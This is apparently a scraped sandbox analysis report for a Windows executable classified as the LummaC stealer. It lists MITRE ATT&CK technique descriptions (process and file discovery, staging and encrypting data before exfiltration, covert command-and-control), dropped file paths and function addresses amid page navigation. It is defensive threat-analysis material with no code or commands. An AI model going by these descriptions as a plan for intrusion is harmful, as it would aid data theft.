Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lJ2eYRm0Bd.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\c12f9ea1

C:\Users\user\AppData\Local\Temp\kheeknpom

C:\Users\user\AppData\Roaming\LVMKGWHFJ\ZWAODZJSDKJ

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Exports

Windows Analysis Report
lJ2eYRm0Bd.exe

Function 008A9A56 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 476
COMMON

Function 008998EC Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 394
stringfilenativeCOMMON

Function 00899F88 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 212
filenativeCOMMON

Function 008B8144 Relevance: 3.1, APIs: 2, Instructions: 91
memoryCOMMON

Function 008D9D44 Relevance: 1.6, APIs: 1, Instructions: 116
timeCOMMON

Function 008973F0 Relevance: 16.2, APIs: 7, Strings: 2, Instructions: 461
fileCOMMON

Function 008CCA65 Relevance: 9.3, APIs: 6, Instructions: 269
COMMON

Function 008B7CC0 Relevance: 7.6, APIs: 5, Instructions: 95
windowCOMMON

Function 008B7F64 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59
COMMON

Function 008AB96E Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 193
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre